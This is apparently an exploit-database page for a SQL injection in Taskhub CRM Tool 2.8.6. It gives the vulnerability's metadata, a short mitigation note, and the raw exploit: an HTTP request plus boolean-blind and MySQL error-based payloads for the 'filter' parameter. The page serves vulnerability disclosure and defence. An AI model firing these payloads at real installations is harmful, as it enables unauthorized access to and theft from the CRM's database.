header-logo
Suggest Exploit
vendor:
CRM Tool
by:
Ahmet Ümit BAYRAM
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: CRM Tool
Affected Version From: 2.8.2006
Affected Version To: 2.8.2006
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, MacOS
2023

Taskhub CRM Tool 2.8.6 – SQL Injection

The Taskhub CRM Tool version 2.8.6 is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL queries and potentially gain unauthorized access to the database.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize and validate user input before using it in SQL queries. Using prepared statements or parameterized queries can also help prevent SQL Injection attacks.
Source

Exploit-DB raw data:

# Exploit Title: Taskhub CRM Tool 2.8.6 - SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor:
https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874
# Tested on: Kali Linux & MacOS
# CVE: N/A

### Request ###
GET /projects?filter=notstarted HTTP/1.1
Host: localhost
Cookie: csrf_cookie_name=a3e6a7d379a3e5f160d72c182ff8a8c8;
ci_session=tgu03eoatvsonh7v986g1vj57b8sufh9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)
Gecko/20100101 Firefox/116.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
### Parameter & Payloads ###
Parameter: filter (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: filter=notstarted' AND 2978=2978 AND 'vMQO'='vMQO
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: filter=notstarted' AND
EXTRACTVALUE(5313,CONCAT(0x5c,0x716a707a71,(SELECT
(ELT(5313=5313,1))),0x71787a6b71)) AND 'ronQ'='ronQ

Navigation

Suggest Exploit

Services By CQR